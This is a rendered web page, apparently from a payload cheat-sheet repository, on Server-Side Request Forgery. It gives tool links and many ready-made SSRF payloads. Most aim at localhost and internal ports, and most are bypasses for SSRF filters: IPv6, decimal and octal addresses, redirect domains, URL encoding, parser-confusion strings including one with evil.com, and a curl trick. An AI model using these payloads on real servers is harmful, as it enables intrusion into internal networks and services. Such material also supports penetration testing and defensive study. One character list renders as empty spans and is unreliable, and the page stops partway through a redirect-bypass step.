<a href="#ssrf-url-for-openstackrackspace" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for OpenStack/RackSpace
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-hp-helion" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for HP Helion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-oracle-cloud" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Oracle Cloud
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-alibaba" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Alibaba
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-kubernetes-etcd" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Kubernetes ETCD
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-docker" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-rancher" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Rancher
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<h1 id="server-side-request-forgery">Server-Side Request Forgery</h1>
<blockquote>
<p>Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.</p>
</blockquote>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#tools">Tools</a></li>
<li><a href="#payloads-with-localhost">Payloads with localhost</a></li>
<li><a href="#bypassing-filters">Bypassing filters</a></li>
<li><a href="#bypass-using-https">Bypass using HTTPS</a></li>
<li><a href="#bypass-localhost-with-">Bypass localhost with [::]</a></li>
<li><a href="#bypass-localhost-with-a-domain-redirection">Bypass localhost with a domain redirection</a></li>
<li><a href="#bypass-localhost-with-cidr">Bypass localhost with CIDR</a></li>
<li><a href="#bypass-using-a-decimal-ip-location">Bypass using a decimal IP location</a></li>
<li><a href="#bypass-using-octal-ip">Bypass using octal IP</a></li>
<li><a href="#bypass-using-ipv6ipv4-address-embedding">Bypass using IPv6/IPv4 Address Embedding</a></li>
<li><a href="#bypass-using-malformed-urls">Bypass using malformed urls</a></li>
<li><a href="#bypass-using-rare-address">Bypass using rare address</a></li>
<li><a href="#bypass-using-url-encoding">Bypass using URL encoding</a></li>
<li><a href="#bypass-using-bash-variables">Bypass using bash variables</a></li>
<li><a href="#bypass-using-tricks-combination">Bypass using tricks combination</a></li>
<li><a href="#bypass-using-enclosed-alphanumerics">Bypass using enclosed alphanumerics</a></li>
<li><a href="#bypass-filter_var-php-function">Bypass filter_var() php function</a></li>
<li><a href="#bypass-against-a-weak-parser">Bypass against a weak parser</a></li>
<li><a href="#bypassing-using-jar-protocol-java-only">Bypassing using jar protocol (java only)</a></li>
<li><a href="#ssrf-exploitation-via-url-scheme">SSRF exploitation via URL Scheme</a></li>
<li><a href="#file">file://</a></li>
<li><a href="#http">http://</a></li>
<li><a href="#dict">dict://</a></li>
<li><a href="#sftp">sftp://</a></li>
<li><a href="#tftp">tftp://</a></li>
<li><a href="#ldap">ldap://</a></li>
<li><a href="#gopher">gopher://</a></li>
<li><a href="#netdoc">netdoc://</a></li>
<li><a href="#ssrf-exploiting-wsgi">SSRF exploiting WSGI</a></li>
<li><a href="#ssrf-exploiting-redis">SSRF exploiting Redis</a></li>
<li><a href="#ssrf-exploiting-pdf-file">SSRF exploiting PDF file</a></li>
<li><a href="#blind-ssrf">Blind SSRF</a></li>
<li><a href="#ssrf-to-xss">SSRF to XSS</a></li>
<li><a href="#ssrf-from-xss">SSRF from XSS</a></li>
<li><a href="#ssrf-url-for-cloud-instances">SSRF URL for Cloud Instances</a></li>
<li><a href="#ssrf-url-for-aws-bucket">SSRF URL for AWS Bucket</a></li>
<li><a href="#ssrf-url-for-aws-ecs">SSRF URL for AWS ECS</a></li>
<li><a href="#ssrf-url-for-aws-elastic-beanstalk">SSRF URL for AWS Elastic Beanstalk</a></li>
<li><a href="#ssrf-url-for-aws-lambda">SSRF URL for AWS Lambda</a></li>
<li><a href="#ssrf-url-for-google-cloud">SSRF URL for Google Cloud</a></li>
<li><a href="#ssrf-url-for-digital-ocean">SSRF URL for Digital Ocean</a></li>
<li><a href="#ssrf-url-for-packetcloud">SSRF URL for Packetcloud</a></li>
<li><a href="#ssrf-url-for-azure">SSRF URL for Azure</a></li>
<li><a href="#ssrf-url-for-openstackrackspace">SSRF URL for OpenStack/RackSpace</a></li>
<li><a href="#ssrf-url-for-hp-helion">SSRF URL for HP Helion</a></li>
<li><a href="#ssrf-url-for-oracle-cloud">SSRF URL for Oracle Cloud</a></li>
<li><a href="#ssrf-url-for-kubernetes-etcd">SSRF URL for Kubernetes ETCD</a></li>
<li><a href="#ssrf-url-for-alibaba">SSRF URL for Alibaba</a></li>
<li><a href="#ssrf-url-for-docker">SSRF URL for Docker</a></li>
<li><a href="#ssrf-url-for-rancher">SSRF URL for Rancher</a></li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li><a href="https://github.com/swisskyrepo/SSRFmap">swisskyrepo/SSRFmap</a> - Automatic SSRF fuzzer and exploitation tool</li>
<li><a href="https://github.com/tarunkant/Gopherus">tarunkant/Gopherus</a> - Generates gopher link for exploiting SSRF and gaining RCE in various servers</li>
<li><a href="https://github.com/In3tinct/See-SURF">In3tinct/See-SURF</a> - Python based scanner to find potential SSRF parameters</li>
<li><a href="https://github.com/teknogeek/ssrf-sheriff">teknogeek/SSRF Sheriff</a> - Simple SSRF-testing sheriff written in Go</li>
<li><a href="https://github.com/assetnote/surf">assetnote/surf</a> - Returns a list of viable SSRF candidates</li>
<li><a href="https://github.com/dwisiswant0/ipfuscator">dwisiswant0/ipfuscator</a> - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go.</li>
</ul>
<h2 id="payloads-with-localhost">Payloads with localhost</h2>
<ul>
<li>Using <code>localhost</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">443</span>
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">22</span>
</code></pre></div></li>
<li>Using <code>127.0.0.1</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">443</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">22</span>
</code></pre></div></li>
<li>Using <code>0.0.0.0</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">:</span><span class="n">443</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">:</span><span class="n">22</span>
</code></pre></div></li>
</ul>
<h2 id="bypassing-filters">Bypassing filters</h2>
<h3 id="bypass-using-https">Bypass using HTTPS</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="n">https</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="n">https</span><span class="p">://</span><span class="n">localhost</span><span class="p">/</span>
</code></pre></div>
<h3 id="bypass-localhost-with">Bypass localhost with [::]</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="n">http</span><span class="p">://[::]:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="n">http</span><span class="p">://[::]:</span><span class="n">25</span><span class="p">/</span> <span class="n">SMTP</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a><span class="n">http</span><span class="p">://[::]:</span><span class="n">22</span><span class="p">/</span> <span class="n">SSH</span>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="n">http</span><span class="p">://[::]:</span><span class="n">3128</span><span class="p">/</span> <span class="n">Squid</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="n">http</span><span class="p">://[</span><span class="n">0000</span><span class="p">::</span><span class="n">1</span><span class="p">]:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="n">http</span><span class="p">://[</span><span class="n">0000</span><span class="p">::</span><span class="n">1</span><span class="p">]:</span><span class="n">25</span><span class="p">/</span> <span class="n">SMTP</span>
<a id="__codelineno-5-3" name="__codelineno-5-3" href="#__codelineno-5-3"></a><span class="n">http</span><span class="p">://[</span><span class="n">0000</span><span class="p">::</span><span class="n">1</span><span class="p">]:</span><span class="n">22</span><span class="p">/</span> <span class="n">SSH</span>
<a id="__codelineno-5-4" name="__codelineno-5-4" href="#__codelineno-5-4"></a><span class="n">http</span><span class="p">://[</span><span class="n">0000</span><span class="p">::</span><span class="n">1</span><span class="p">]:</span><span class="n">3128</span><span class="p">/</span> <span class="n">Squid</span>
</code></pre></div>
<h3 id="bypass-localhost-with-a-domain-redirection">Bypass localhost with a domain redirection</h3>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Redirect to</th>
</tr>
</thead>
<tbody>
<tr>
<td>localtest.me</td>
<td><code>::1</code></td>
</tr>
<tr>
<td>localh.st</td>
<td><code>127.0.0.1</code></td>
</tr>
<tr>
<td>spoofed.[BURP_COLLABORATOR]</td>
<td><code>127.0.0.1</code></td>
</tr>
<tr>
<td>spoofed.redacted.oastify.com</td>
<td><code>127.0.0.1</code></td>
</tr>
<tr>
<td>company.127.0.0.1.nip.io</td>
<td><code>127.0.0.1</code></td>
</tr>
</tbody>
</table>
<p>The service nip.io is awesome for that, it will convert any ip address as a dns.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="n">NIP</span><span class="p">.</span><span class="n">IO</span> <span class="n">maps</span> <span class="p">&lt;</span><span class="n">anything</span><span class="p">&gt;.&lt;</span><span class="n">IP</span> <span class="n">Address</span><span class="p">&gt;.</span><span class="n">nip</span><span class="p">.</span><span class="n">io</span> <span class="n">to</span> <span class="n">the</span> <span class="n">corresponding</span> <span class="p">&lt;</span><span class="n">IP</span> <span class="n">Address</span><span class="p">&gt;,</span> <span class="n">even</span> <span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">nip</span><span class="p">.</span><span class="n">io</span> <span class="n">maps</span> <span class="n">to</span> <span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
</code></pre></div>
<h3 id="bypass-localhost-with-cidr">Bypass localhost with CIDR</h3>
<p>IP addresses from 127.0.0.0/8</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">127</span><span class="p">.</span><span class="n">127</span><span class="p">.</span><span class="n">127</span>
<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">3</span>
<a id="__codelineno-7-3" name="__codelineno-7-3" href="#__codelineno-7-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span>
</code></pre></div>
<h3 id="bypass-using-a-decimal-ip-location">Bypass using a decimal IP location</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="n">http</span><span class="p">://</span><span class="n">2130706433</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="n">http</span><span class="p">://</span><span class="n">3232235521</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="n">http</span><span class="p">://</span><span class="n">3232235777</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-8-4" name="__codelineno-8-4" href="#__codelineno-8-4"></a><span class="n">http</span><span class="p">://</span><span class="n">2852039166</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span>
</code></pre></div>
<h3 id="bypass-using-octal-ip">Bypass using octal IP</h3>
<p>Implementations differ on how to handle octal format of ipv4.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a>http://0177.0.0.1/<span class="w"> </span><span class="o">=</span><span class="w"> </span>http://127.0.0.1
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a>http://o177.0.0.1/<span class="w"> </span><span class="o">=</span><span class="w"> </span>http://127.0.0.1
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a>http://0o177.0.0.1/<span class="w"> </span><span class="o">=</span><span class="w"> </span>http://127.0.0.1
<a id="__codelineno-9-4" name="__codelineno-9-4" href="#__codelineno-9-4"></a>http://q177.0.0.1/<span class="w"> </span><span class="o">=</span><span class="w"> </span>http://127.0.0.1
<a id="__codelineno-9-5" name="__codelineno-9-5" href="#__codelineno-9-5"></a>...
</code></pre></div>
<p>Ref:
- <a href="https://www.youtube.com/watch?v=_o1RPJAe4kU">DEFCON 29-KellyKaoudis SickCodes-Rotten code, aging standards &amp; pwning IPv4 parsing</a>
- <a href="https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf">AppSecEU15-Server_side_browsing_considered_harmful.pdf</a></p>
<h3 id="bypass-using-ipv6ipv4-address-embedding">Bypass using IPv6/IPv4 Address Embedding</h3>
<p><a href="http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm">IPv6/IPv4 Address Embedding</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="n">http</span><span class="p">://[</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">ffff</span><span class="p">:</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">]</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="n">http</span><span class="p">://[::</span><span class="n">ffff</span><span class="p">:</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">]</span>
</code></pre></div>
<h3 id="bypass-using-malformed-urls">Bypass using malformed urls</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="n">localhost</span><span class="p">:+</span><span class="n">11211aaa</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="n">localhost</span><span class="p">:</span><span class="n">00011211aaaa</span>
</code></pre></div>
<h3 id="bypass-using-rare-address">Bypass using rare address</h3>
<p>You can short-hand IP addresses by dropping the zeros</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">/</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
</code></pre></div>
<h3 id="bypass-using-url-encoding">Bypass using URL encoding</h3>
<p><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter">Single or double encode a specific URL to bypass blacklist</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span><span class="k">%</span><span class="n">61dmin</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span><span class="k">%</span><span class="n">2561dmin</span>
</code></pre></div>
<h3 id="bypass-using-bash-variables">Bypass using bash variables</h3>
<p>(curl only)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="nb">curl </span><span class="n">-v</span> <span class="s2">&quot;http://evil$google.com&quot;</span>
<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a><span class="nv">$google</span> <span class="p">=</span> <span class="s2">&quot;&quot;</span>
</code></pre></div>
<h3 id="bypass-using-tricks-combination">Bypass using tricks combination</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="n">http</span><span class="p">://</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span> <span class="p">&amp;</span><span class="nv">@2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="c"># @3.3.3.3/</span>
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a><span class="n">urllib2</span> <span class="p">:</span> <span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a><span class="n">requests</span> <span class="p">+</span> <span class="n">browsers</span> <span class="p">:</span> <span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span>
<a id="__codelineno-15-4" name="__codelineno-15-4" href="#__codelineno-15-4"></a><span class="n">urllib</span> <span class="p">:</span> <span class="n">3</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">3</span>
</code></pre></div>
<h3 id="bypass-using-enclosed-alphanumerics">Bypass using enclosed alphanumerics</h3>
<p><a href="https://twitter.com/EdOverflow">@EdOverflow</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="n">http</span><span class="p">://</span><span class="err">ⓔⓧⓐⓜⓟⓛⓔ</span><span class="p">.</span><span class="err">ⓒⓞⓜ</span> <span class="p">=</span> <span class="n">example</span><span class="p">.</span><span class="n">com</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="n">List</span><span class="p">:</span>
<a id="__codelineno-16-4" name="__codelineno-16-4" href="#__codelineno-16-4"></a><span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span>
</code></pre></div>
<h3 id="bypass-using-unicode">Bypass using unicode</h3>
<p>In some languages (.NET, Python 3) regex supports unicode by default.
<code>\d</code> includes <code>0123456789</code> but also <code>๐๑๒๓๔๕๖๗๘๙</code>.</p>
<h3 id="bypass-filter_var-php-function">Bypass filter_var() php function</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="n">0</span><span class="p">://</span><span class="n">evil</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">80</span><span class="p">;</span><span class="n">http</span><span class="p">://</span><span class="n">google</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
</code></pre></div>
<h3 id="bypass-against-a-weak-parser">Bypass against a weak parser</h3>
<p>by Orange Tsai (<a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf">Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf</a>)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="p">\</span><span class="nv">@127</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-18-2" name="__codelineno-18-2" href="#__codelineno-18-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="p">\</span><span class="nv">@@127</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-18-3" name="__codelineno-18-3" href="#__codelineno-18-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="p">:\</span><span class="nv">@@127</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-18-4" name="__codelineno-18-4" href="#__codelineno-18-4"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="c">#\@127.2.2.2:80/</span>
</code></pre></div>
<p><img alt="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true" src="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true" /></p>
<h3 id="bypassing-using-a-redirect">Bypassing using a redirect</h3>
<p><a href="https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection">using a redirect</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="n">1</span><span class="p">.</span> <span class="n">Create</span> <span class="n">a</span> <span class="n">page</span> <span class="n">on</span> <span class="n">a</span> <span class="n">whitelisted</span> <span class="n">host</span> <span class="n">that</span> <span class="n">redirects</span> <span class="n">requests</span> <span class="n">to</span> <span class="n">the</span> <span class="n">SSRF</span> <span class="n">the</span> <span class="n">target</span> <span class="n">URL</span> <span class="p">(</span><span class="n">e</span><span class="p">.</span><span class="n">g</span><span class="p">.</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">)</span>
